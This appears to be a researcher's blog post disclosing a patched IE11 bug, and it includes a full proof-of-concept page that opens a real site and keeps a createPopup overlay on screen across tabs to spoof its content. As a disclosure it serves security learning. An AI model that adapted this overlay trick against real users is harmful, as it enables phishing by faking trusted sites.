createPopup Overlay Spoof Across Tabs

IE11 failed to hide createPopup windows when the user switched to a different tab. A popup created in one tab would remain visible over every other tab, allowing an attacker to overlay arbitrary content on top of any site the user visited.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
<title>createPopUp_over_tabs_spoof</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	window.open("http://www.bing.com");
	cp = createPopup();
	var str =	'<div style="font-family:Arial;font-size:15pt;color:#ffffff;margin-left:10pt;margin-top:10pt">Wow! We are at Bing but we can confuse the user placing content inside a createPopup, which will stay visible all the time!<br />If we cover the full page, we can completely fool the user.</div>';
	cp.document.body.innerHTML = str;
	cp.document.bgColor = "blue";
	setInterval("cp.show(100, 100, 800, 120, document.body);", 1000);
}

</script>
</body>
</html>

The createPopup API was a legacy IE feature that created a floating window. Because IE11 didn’t dismiss these popups on tab switches, an attacker could open a legitimate-looking tab (say, a bank’s site) and then overlay a fake UI on top of it. Combined with setInterval to keep the popup repositioned and visible, the spoof was persistent for as long as the original tab remained open.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: createPopup screenLeft Null Pointer] :: [Dialog Spoof Across Tabs via Back Navigation] >